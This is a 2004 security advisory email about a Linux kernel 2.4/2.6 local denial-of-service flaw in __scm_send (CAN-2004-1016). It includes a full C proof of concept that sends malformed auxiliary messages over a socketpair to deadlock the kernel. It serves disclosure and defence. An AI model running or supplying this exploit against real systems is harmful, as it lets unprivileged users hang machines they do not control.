Date: 15 Dec 2004 18:05:59 +0200
From: SecuriTeam <support@securiteam.com.>
To: [email protected]Subject: [UNIX] Linux Kernel scm_send Local DoS Vulnerability
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Linux Kernel scm_send Local DoS Vulnerability
------------------------------------------------------------------------
SUMMARY
A locally exploitable flaw has been found in the Linux socket layer that
allows a local user to hang a vulnerable machine.
DETAILS
Vulnerable Systems:
* Linux kernel versions 2.4 up to and including 2.4.28
* Linux kernel versions 2.6 up to and including 2.6.9
CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1016>;
CAN-2004-1016
The Linux kernel provides a powerful socket API to user applications.
Among other functions, sockets provide an universal way for IPC and
user-kernel communication. The socket layer uses several logical sub
layers. One of the layers, the auxiliary message layer (or scm layer)
augments the socket API by a universal user-kernel message passing
capability (see recvfrom(2) for more details on auxiliary messages).
One of the scm message parsing functions invoked from the kernel sendmsg()
code is __scm_send() and it suffers from a deadlock condition if a
carefully prepared auxiliary message is sent to a socket by an
unprivileged application.
Note: The kernel 2.4 branch is not further exploitable but on the 2.6.x
branch it might be possible to gain elevated privileges.
Proof Of Concept
/*
* Linux kernel 2.4 & 2.6 __scm_send DoS
* Warning! this code will hang your machine
*
* gcc -O2 scmbang.c -o scmbang
*
* Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <sys/socket.h>
#include <arpa/inet.h>
static char buf[1024];
void
fatal (const char *msg)
{
printf ("\n");
if (!errno)
{
fprintf (stderr, "FATAL: %s\n", msg);
}
else
{
perror (msg);
}
printf ("\n");
fflush (stdout);
fflush (stderr);
exit (1);
}
int
main (void)
{
int s[2], r;
struct sockaddr_in sin;
struct msghdr *msg;
struct cmsghdr *cmsg;
r = socketpair (AF_UNIX, SOCK_DGRAM, 0, s);
if (r < 0)
fatal ("socketpair");
memset (buf, 0, sizeof (buf));
msg = (void *) buf;
msg->msg_control = (void *) (msg + 1);
// make bad cmsgs
cmsg = (void *) msg->msg_control;
cmsg->cmsg_len = sizeof (*cmsg);
cmsg->cmsg_level = 0xdeadbebe;
cmsg->cmsg_type = 12; // len after overflow on second msg
cmsg++;
// -12 for deadlock
cmsg->cmsg_len = -12;
cmsg->cmsg_level = SOL_IP;
msg->msg_controllen = (unsigned) (cmsg + 1) - (unsigned)
msg->msg_control;
r = sendmsg (s[0], msg, 0);
if (r < 0)
fatal ("sendmsg");
printf ("\nYou lucky\n");
fflush (stdout);
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:ihaquer@isec.pl.> Paul
Starzetz.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
